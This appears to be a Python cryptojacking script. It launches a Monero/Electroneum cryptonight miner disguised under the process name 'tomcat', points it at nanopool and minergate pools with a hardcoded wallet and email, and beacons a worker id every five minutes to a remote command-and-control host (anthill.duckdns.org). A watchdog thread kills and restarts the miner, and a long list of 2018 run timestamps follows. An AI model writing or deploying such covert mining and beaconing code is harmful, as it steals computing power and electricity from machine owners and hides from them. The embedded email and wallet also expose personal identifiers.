import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:01.828972
#2018-02-17 16:04:03.834015
#2018-02-17 17:53:05.185926
#2018-02-17 19:39:05.037345
#2018-02-17 21:28:04.270021
#2018-02-17 23:13:04.546349
#2018-02-18 00:59:06.531769
#2018-02-18 02:47:07.103022
#2018-02-18 04:36:06.285803
#2018-02-18 06:27:07.218746
#2018-02-18 08:16:05.836703
#2018-02-18 10:04:01.469402
#2018-02-18 11:50:07.892239
#2018-02-18 13:35:01.427507
#2018-02-18 15:25:04.115540
#2018-02-18 17:13:01.835095
#2018-02-18 19:01:01.904043
#2018-02-18 20:48:04.277940
#2018-02-18 22:35:01.746972
#2018-02-19 00:23:06.750117
#2018-02-19 02:09:07.599060
#2018-02-19 03:57:01.326433
#2018-02-19 05:41:06.133260
#2018-02-19 07:30:07.700967
#2018-02-19 09:19:08.081009
#2018-02-19 11:09:04.266423
#2018-02-19 12:56:01.623086
#2018-02-19 14:44:09.145366
#2018-02-19 16:35:10.781666
#2018-02-19 18:23:08.554943
#2018-02-19 20:10:07.660352
#2018-02-19 22:00:08.647921
#2018-02-19 23:44:13.688344
#2018-02-20 01:32:05.111860
#2018-02-20 03:20:01.703662
#2018-02-20 05:07:04.930908
#2018-02-20 06:50:06.444675
#2018-02-20 08:36:08.429433
#2018-02-20 10:20:09.167164
#2018-02-20 12:05:05.169856
#2018-02-20 13:53:01.906850
#2018-02-20 15:34:01.924288
#2018-02-20 17:19:06.535523
#2018-02-20 19:08:06.004512
#2018-02-20 20:56:04.614491
#2018-02-20 22:41:07.525684
#2018-02-21 01:26:07.559935
#2018-02-21 03:14:01.945024
#2018-02-21 05:02:06.922836
#2018-02-21 06:50:06.315584
#2018-02-21 08:38:08.113917
#2018-02-21 10:23:05.410283
#2018-02-21 12:11:02.127403
#2018-02-21 13:59:05.419184
#2018-02-21 15:43:07.732558
#2018-02-21 17:34:06.950403
#2018-02-21 19:20:07.822346
#2018-02-21 21:08:03.891959
#2018-02-21 22:54:07.115105
#2018-02-22 00:42:05.313256
#2018-02-22 02:29:07.313161
#2018-02-22 04:16:01.286715
#2018-02-22 06:01:06.367721
#2018-02-22 07:48:05.383485
#2018-02-22 09:36:01.923642
#2018-02-22 11:21:09.548205
#2018-02-22 13:06:07.844319
#2018-02-22 14:54:05.963758
#2018-02-22 16:39:01.296835
#2018-02-22 18:24:07.826432
#2018-02-22 20:17:03.760750
#2018-02-22 22:03:07.386959
#2018-02-22 23:51:05.571900
#2018-02-23 01:38:07.531490
#2018-02-23 03:24:05.682856
#2018-02-23 05:11:05.886187
#2018-02-23 06:58:07.259318
#2018-02-23 08:47:05.833245
#2018-02-23 11:07:01.971699
#2018-02-23 13:01:05.941565
#2018-02-23 14:47:07.808095
#2018-02-23 16:36:07.315709
#2018-02-23 18:22:05.816397
#2018-02-23 20:08:07.173890
#2018-02-23 21:56:01.904751
#2018-02-23 23:43:05.802000
#2018-02-24 01:36:06.807745
#2018-02-24 03:24:05.854695
#2018-02-24 05:10:07.766897
#2018-02-24 06:59:01.379274
#2018-02-24 08:50:08.190996
#2018-02-24 10:51:05.194727
#2018-02-24 12:38:07.341614
#2018-02-24 14:26:07.347519
#2018-02-24 16:14:03.968871
#2018-02-24 18:07:02.220980
#2018-02-24 19:53:03.165428
#2018-02-24 21:37:05.030564
#2018-02-25 02:02:06.269046
#2018-02-25 05:57:06.220081
#2018-02-25 11:38:05.464860